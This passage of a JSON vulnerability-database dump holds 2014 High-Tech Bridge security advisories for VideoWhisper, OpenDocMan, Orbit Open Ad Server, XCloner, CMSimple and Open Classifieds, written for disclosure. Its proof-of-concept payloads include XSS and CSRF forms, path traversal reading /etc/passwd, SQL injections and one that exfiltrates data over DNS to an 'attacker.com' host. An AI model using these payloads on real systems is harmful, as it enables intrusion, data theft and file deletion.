CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/32790/"}], "packetstorm": [{"lastseen": "2016-12-05T22:24:07", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-02-27T00:00:00", "type": "packetstorm", "title": "VideoWhisper Live Streaming Integration 4.27.3 XSS / Shell Upload / Traversal", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1907", "CVE-2014-1906", "CVE-2014-1905", "CVE-2014-1908"], "modified": "2014-02-27T00:00:00", "href": "https://packetstormsecurity.com/files/125454/VideoWhisper-Live-Streaming-Integration-4.27.3-XSS-Shell-Upload-Traversal.html", "id": "PACKETSTORM:125454", "sourceData": "`Advisory ID: HTB23199 \nProduct: VideoWhisper Live Streaming Integration \nVendor: VideoWhisper \nVulnerable Version(s): 4.27.3 and probably prior \nTested Version: 4.27.3 \nAdvisory Publication: February 6, 2014 [without technical details] \nVendor Notification: February 6, 2014 \nVendor Patch: February 7, 2014 \nPublic Disclosure: February 27, 2014 \nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211] \nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908 \nRisk Level: Critical \nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files. \n \n \n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905 \n \nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system. \n \nThe following PoC code demonstrates exploitation of the vulnerability: \n \nAfter successful exploitation the remote shell will be accessible via the following URL: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg \n \nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension. \n \n \n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906 \n \n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u2019s widget. The script will be also executed in administrative section on the following page: \n \nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=live \n \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"u\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page. \n \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php\" method=\"post\"> \n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n</form> \n</body> \n \nThe code will be executed when the user visits the following URL: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/uploads/[room]/Log[date].html \n \nWhere [room] is set by HTTP POST parameter r and [date] is the current date. \n \n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n \n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \n \n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n \n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907 \n \n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php\" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences. \n \nThe exploitation example below displays contents of \"/etc/passwd\" file: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd \n \n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences. \n \nThe exploitation example below deletes a file \"/tmp/immuniweb\": \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb \n \nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system. \n \n \n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908 \n \n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application. \n \nThe following URL can be used to gain knowledge of full installation path of the application: \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp.php \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/videowhisper_streaming.php \n \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp.inc.php \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to VideoWhisper Live Streaming Integration version 4.29.5 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress. \n[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125454/videowhisper-xssshelltraversal.txt"}, {"lastseen": "2016-12-05T22:15:33", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-03-06T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "OpenDocMan 1.2.7 SQL Injection / Access Control", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1946", "CVE-2014-1945"], "modified": "2014-03-06T00:00:00", "href": "https://packetstormsecurity.com/files/125571/OpenDocMan-1.2.7-SQL-Injection-Access-Control.html", "id": "PACKETSTORM:125571", "sourceData": "`Advisory ID: HTB23202 \nProduct: OpenDocMan \nVendor: Free Document Management Software \nVulnerable Version(s): 1.2.7 and probably prior \nTested Version: 1.2.7 \nAdvisory Publication: February 12, 2014 [without technical details] \nVendor Notification: February 12, 2014 \nVendor Patch: February 24, 2014 \nPublic Disclosure: March 5, 2014 \nVulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284] \nCVE References: CVE-2014-1945, CVE-2014-1946 \nRisk Level: High \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application. \n \n \n1) SQL Injection in OpenDocMan: CVE-2014-1945 \n \nThe vulnerability exists due to insufficient validation of \"add_value\" HTTP GET parameter in \"/ajax_udf.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe exploitation example below displays version of the MySQL server: \n \nhttp://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 \n \n \n2) Improper Access Control in OpenDocMan: CVE-2014-1946 \n \nThe vulnerability exists due to insufficient validation of allowed action in \"/signup.php\" script when updating user\u2019s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application. \n \nThe exploitation example below assigns administrative privileges for the current account: \n \n<form action=\"http://[host]/signup.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"updateuser\" value=\"1\"> \n<input type=\"hidden\" name=\"admin\" value=\"1\"> \n<input type=\"hidden\" name=\"id\" value=\"[USER_ID]\"> \n<input type=\"submit\" name=\"login\" value=\"Run\"> \n</form> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to OpenDocMan v1.2.7.2 \n \nMore Information: \nhttp://www.opendocman.com/opendocman-v1-2-7-1-release/ \nhttp://www.opendocman.com/opendocman-v1-2-7-2-released/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan. \n[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125571/opendocman127-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:16:55", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-04-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "Orbit Open Ad Server 1.1.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2540"], "modified": "2014-04-09T00:00:00", "href": "https://packetstormsecurity.com/files/126074/Orbit-Open-Ad-Server-1.1.0-SQL-Injection.html", "id": "PACKETSTORM:126074", "sourceData": "`Advisory ID: HTB23208 \nProduct: Orbit Open Ad Server \nVendor: OrbitScripts, LLC \nVulnerable Version(s): 1.1.0 and probably prior \nTested Version: 1.1.0 \nAdvisory Publication: March 19, 2014 [without technical details] \nVendor Notification: March 19, 2014 \nVendor Patch: March 21, 2014 \nPublic Disclosure: April 9, 2014 \nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-2540 \nRisk Level: High \nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website. \n \n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540 \n \nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database: \n \n \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input type=\"hidden\" name=\"category_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\"> \n<input type=\"hidden\" name=\"form_mode\" value=\"save\"> \n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\"> \n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\"> \n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\"> \n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\"> \n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Orbit Open Ad Server 1.1.1 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23208 - https://www.htbridge.com/advisory/HTB23208 - SQL Injection in Orbit Open Ad Server. \n[2] Orbit Open Ad Server - http://orbitopenadserver.com/ - the free, open source ad tool that lets you manage the profits while we manage the technology. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126074/orbitopenadserver-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:23:18", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-04-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "packetstorm", "title": "WordPress XCloner 3.1.0 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2340"], "modified": "2014-04-02T00:00:00", "href": "https://packetstormsecurity.com/files/125991/WordPress-XCloner-3.1.0-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:125991", "sourceData": "`Advisory ID: HTB23206 \nProduct: XCloner Wordpress plugin \nVendor: XCloner \nVulnerable Version(s): 3.1.0 and probably prior \nTested Version: 3.1.0 \nAdvisory Publication: March 12, 2014 [without technical details] \nVendor Notification: March 12, 2014 \nVendor Patch: March 13, 2014 \nPublic Disclosure: April 2, 2014 \nVulnerability Type: Cross-Site Request Forgery [CWE-352] \nCVE Reference: CVE-2014-2340 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website. \n \n \n\u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340 \n \nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup. \n \nSimple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL: \n \n \n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"dbbackup\" value=\"1\"> \n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\"> \n<input type=\"hidden\" name=\"bname\" value=\"backup\"> \n<input type=\"hidden\" name=\"backupComments\" value=\"\"> \n<input type=\"hidden\" name=\"option\" value=\"com_cloner\"> \n<input type=\"hidden\" name=\"task\" value=\"generate\"> \n<input type=\"hidden\" name=\"boxchecked\" value=\"0\"> \n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\"> \n<input type=\"hidden\" name=\"\" value=\"\"> \n<input type=\"submit\" name=\"run\" value=\"run\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to XCloner 3.1.1 \n \nMore Information: \nhttp://www.xcloner.com/support/download/?did=9 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - \u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin. \n[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125991/wpxcloner-xsrf.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:15:19", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-03-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "packetstorm", "title": "CMSimple 3.54 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2219"], "modified": "2014-03-20T00:00:00", "href": "https://packetstormsecurity.com/files/125797/CMSimple-3.54-Cross-Site-Scripting.html", "id": "PACKETSTORM:125797", "sourceData": "`Advisory ID: HTB23205 \nProduct: CMSimple \nVendor: Preben Bjorn Biermann Madsen \nVulnerable Version(s): 3.54 and probably prior \nTested Version: 3.54 \nAdvisory Publication: February 26, 2014 [without technical details] \nVendor Notification: February 26, 2014 \nVendor Patch: February 26, 2014 \nPublic Disclosure: March 19, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-2219 \nRisk Level: Medium \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in CMSimple, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in CMSimple: CVE-2014-2219 \n \nThe vulnerability exists due to insufficient sanitisation of user-supplied data in \"d\" HTTP GET parameter passed to \"/whizzywig/wb.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \n \nhttp://[host]/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nFixed by vendor on February 26, 2014 directly in the source code without version modification/new release. Update to the version 3.54 released after February 26, 2014. \n \nMore Information: \nhttp://sourceforge.net/projects/cmsimple-le/files/cmsimple_classic/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23205 - https://www.htbridge.com/advisory/HTB23205 - Cross-Site Scripting (XSS) in CMSimple. \n[2] CMSimple - http://cmsimple.p2pnation.eu/ - CMSimple is a content management system primarily designed for easy creation and maintenance of small commercial sites, or sites for associations and individuals. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125797/cmsimple354-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:15:31", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-03-12T00:00:00", "type": "packetstorm", "title": "Open Classifieds 2-2.1.2 Cross Site Scripting", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2024"], "modified": "2014-03-12T00:00:00", "href": "https://packetstormsecurity.com/files/125675/Open-Classifieds-2-2.1.2-Cross-Site-Scripting.html", "id": "PACKETSTORM:125675", "sourceData": "`Advisory ID: HTB23204 \nProduct: Open Classifieds \nVendor: Open Classifieds Team \nVulnerable Version(s): 2-2.1.2 and probably prior \nTested Version: 2-2.1.2 \nAdvisory Publication: February 19, 2014 [without technical details] \nVendor Notification: February 19, 2014 \nVendor Patch: February 20, 2014 \nPublic Disclosure: March 12, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-2024 \nRisk Level: Medium \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n 